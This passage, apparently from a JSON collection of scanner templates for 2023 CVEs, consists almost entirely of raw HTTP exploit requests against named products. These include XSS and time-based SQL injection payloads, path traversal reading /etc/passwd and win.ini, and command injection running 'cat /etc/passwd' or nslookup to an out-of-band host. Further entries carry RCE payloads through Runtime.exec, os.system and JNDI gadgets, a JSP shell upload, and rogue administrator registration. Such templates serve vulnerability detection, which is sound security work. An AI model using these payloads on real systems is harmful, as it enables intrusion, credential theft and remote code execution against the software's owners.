/wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert`document_domain`</script>\")","contains(body_2, \"tablesome\")"],"condition":"and"}]}]},{"id":"CVE-2023-1434","info":{"name":"Odoo - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","\"params\":","session"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36346","info":{"name":"POS Codekop v2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.location)</script>","<title>print</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1730","info":{"name":"SupportCandy < 3.1.5 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: wpsc_guest_login_auth={\"email\":\"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"supportcandy\")"],"condition":"and"}]}]},{"id":"CVE-2023-24367","info":{"name":"Temenos T24 R20 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/genrequest.jsp?routineName=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>Processing...</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39026","info":{"name":"FileMage Gateway - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body,'bit app support','extensions','fonts')","contains(content_type, 'text/plain')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27372","info":{"name":"SPIP - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\n","POST /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:\"<?php phpinfo(); ?>\";\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name='formulaire_action_args'[^>]*value='([^']*)'"],"internal":true,"part":"body_1"},{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body_2"}]}]},{"id":"CVE-2023-29922","info":{"name":"PowerJob V4.3.1 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["POST /user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{str}}\",\"phone\":\"{{str}}\",\"email\":\"{{str}}\",\"webHook\":\"{{str}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"data\":null"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29300","info":{"name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-36287","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncontroller=change-currency9405'-alert(document.domain)-'&id_currency=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'change-currency9405'-alert(document.domain)-'';","customizationIdMessage"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27350","info":{"name":"PaperCut - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /app?service=page/SetupCompleted HTTP/1.1\nHost: {{Hostname}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FSetupCompleted%2F%24Form&sp=S0&Form0=%24Hidden%2CanalyticsEnabled%2C%24Submit&%24Hidden=true&%24Submit=Login\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print-and-device.script.enabled&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=Y&%24Submit=Update\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print.script.sandboxed&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=N&%24Submit=Update\n","GET /app?service=page/PrinterList HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=page%2FPrinterList\n","POST /app?service=direct/1/PrinterList/selectPrinter&sp={{printerID}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterList%2FselectPrinter&sp={{printerID}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2FprinterOptionsTab.tab&sp=4\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2F%24PrinterDetailsScript.%24Form&sp=S0&Form0=printerId%2CenablePrintScript%2CscriptBody%2C%24Submit%2C%24Submit%240%2C%24Submit%241&printerId={{printerID}}&enablePrintScript=on&scriptBody=function+printJobHook%28inputs%2C+actions%29+%7B%7D%0D%0Ajava.lang.Runtime.getRuntime%28%29.exec%28%27{{cmd}}%27%29%3B&%24Submit%241=Apply\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Avanceret kontering"]}],"extractors":[{"type":"regex","name":"printerID","group":1,"regex":["erList\\/selectPrinterCost&amp;sp=([a-z0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-2732","info":{"name":"MStore API <= 3.9.2 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/add-listing?id=1 HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["email-description","Username"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0563","info":{"name":"Bank Locker Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-locker-details.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"/><script>alert(document.domain)</script>\")","contains(body, \"Bank Locker Management System\")"],"condition":"and"}]}]},{"id":"CVE-2023-34192","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=preferred\n","GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>","zimbra"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","part":"header_2","status":[200]}]}]},{"id":"CVE-2023-20888","info":{"name":"VMware Aria Operations for Networks - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/events/push-notifications HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: application/json\n\n{\"endOffset\": \"{{ generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\") }} \"}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-31059","info":{"name":"Repetier Server - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"],"matchers-condition":"and","matchers":[{"type":"binary","part":"body","binary":["53514C69746520666F726D6174203300"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3460","info":{"name":"Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /index.php/register/?{{version}} HTTP/1.1\nHost: {{Hostname}}\n","GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1\n"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_1), \"ultimate member\")","regex(\"wordpress_logged_in_[a-z0-9]{32}\", header_4)","status_code_4 == 302"],"condition":"and"}],"extractors":[{"type":"regex","name":"path","part":"location_2","group":1,"regex":["([a-z:/.]+)"],"internal":true},{"type":"regex","name":"version","part":"body_1","group":1,"regex":["(?i)Stable.tag:\\s?([\\w.]+)"],"internal":true},{"type":"regex","name":"formid","part":"body_3","group":1,"regex":["name=\"form_id\" id=\"form_id_([0-9]+)\""],"internal":true},{"type":"regex","name":"wpnonce","part":"body_3","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\""],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-28343","info":{"name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /index.php/management/set_timezone HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nAccept-Encoding: gzip, deflate\nReferer: {{RootURL}}/index.php/management/datetime\n\ntimezone=`nslookup {{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Time Zone updated successfully"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23333","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nGET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["33332-3202-EVC"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27034","info":{"name":"Blind SQL injection vulnerability in Jms Blog","severity":"critical"},"requests":[{"raw":["@timeout: 12s\nPOST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1\nContent-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\nHost: {{Hostname}}\nConnection: Keep-alive\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"comment\"\n\n555\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"customer_name\"\n\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"email\"\n\n0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id_comment_reply\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"submitComment\"\n\nsubmitComment=\n------------YWJkMTQzNDcw--\n","GET /modules/jmsblog/config.xml HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(body_2, \"Jms Blog\")"],"condition":"and"}]}]},{"id":"CVE-2023-26256","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["$textMime"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3836","info":{"name":"Dahua Smart Park Management - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1\nContent-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nHost: {{Hostname}}\n\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{random_str}}.jsp\"\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: binary\n\n{{match_str}}\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--\n","GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 200","contains(body_2, '{{match_str}}')"],"condition":"and"}],"extractors":[{"type":"regex","name":"shell_filename","internal":true,"part":"body_1","regex":["ico_res_(\\w+)_on\\.jsp"]}]}]},{"id":"CVE-2023-39598","info":{"name":"IceWarp Email Client - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","icewarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2796","info":{"name":"EventON <= 2.1 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34960","info":{"name":"Chamilo Command Injection","severity":"critical"},"requests":[{"raw":["POST /main/webservices/additional_webservices.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{RootURL}}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type=\"ns2:Map\"><item><key xsi:type=\"xsd:string\">file_data</key><value xsi:type=\"xsd:string\"></value></item><item><key xsi:type=\"xsd:string\">file_name</key><value xsi:type=\"xsd:string\">`{}`.pptx'|\" |cat /etc/passwd||a #</value></item><item><key xsi:type=\"xsd:string\">service_ppt2lp_size</key><value xsi:type=\"xsd:string\">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"part":"body"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39120","info":{"name":"Nodogsplash - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["nodogsplash","password"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0236","info":{"name":"WordPress Tutor LMS <2.0.10 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg onload=prompt(document.domain)>\")","contains(body_2, \"Instructor Registration\")"],"condition":"and"}]}]},{"id":"CVE-2023-34537","info":{"name":"Hoteldruid 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /inizio.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nvers_hinc=1&nome_utente_phpr={{username}}&password_phpr={{password}}\n","POST /creaprezzi.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1\n"],"skip-variables-check":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"HotelDruid\")"],"condition":"and"}]}]},{"id":"CVE-2023-2178","info":{"name":"Aajoda Testimonials < 2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></textarea><script>alert(document.domain)</script>\")","contains(body_2, \"page_aajoda-testimonials\")"],"condition":"and"}]}]},{"id":"CVE-2023-0297","info":{"name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","severity":"critical"},"requests":[{"raw":["GET /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\n","POST /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["JDownloader"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-29919","info":{"name":"SolarView Compact <= 6.00 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /texteditor.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"texteditor.php\"","adduser.conf","deluser.conf"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24044","info":{"name":"Plesk Obsidian <=18.0.49 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php"],"headers":{"Host":"evil.com"},"matchers-condition":"and","matchers":[{"type":"word","part":"location","words":["https://evil.com/login_up.php"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-4173","info":{"name":"mooSocial 3.1.8 - Reflected XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.domain')%3E/search?category=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert('document.domain')>","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-0968","info":{"name":"WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=watu_takings&exam_id=1&dn=\"%2Fonmouseover%3Dalert(document.domain)%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/onmouseover=alert(document.domain)//\")","contains(body_2, \"Watu Quizzes\")"],"condition":"and"}]}]},{"id":"CVE-2023-22480","info":{"name":"KubeOperator Foreground `kubeconfig` - File Download","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/clusters/kubeconfig/k8s"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiVersion:","clusters:"],"condition":"and"},{"type":"word","part":"header","words":["application/download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1080","info":{"name":"WordPress GN Publisher <1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/ onmouseover=alert(document.domain);//\")","contains(body_2, \"GN Publisher\")"],"condition":"and"}]}]},{"id":"CVE-2023-34599","info":{"name":"Gibbon v25.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php? HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary8m88nqhR1NAnQEYZ\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"address\"\n\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"method\"\n\ndefault\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\n\n017\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibboni18nID\"\n\n0001\n------WebKitFormBoundary8m88nqhR1NAnQEYZ--\n","GET /index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq'><script>alert(document.domain)</script>oq7c8fmwwro&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["><script>alert(document.domain)</script>","gibbon"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2023","info":{"name":"Custom 404 Pro < 3.7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2023-22897","info":{"name":"Securepoint UTM - Leaking Remote Memory Contents","severity":"medium"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"sessionid\":","\"mode\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2648","info":{"name":"Weaver E-Office 9.5 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nAccept: 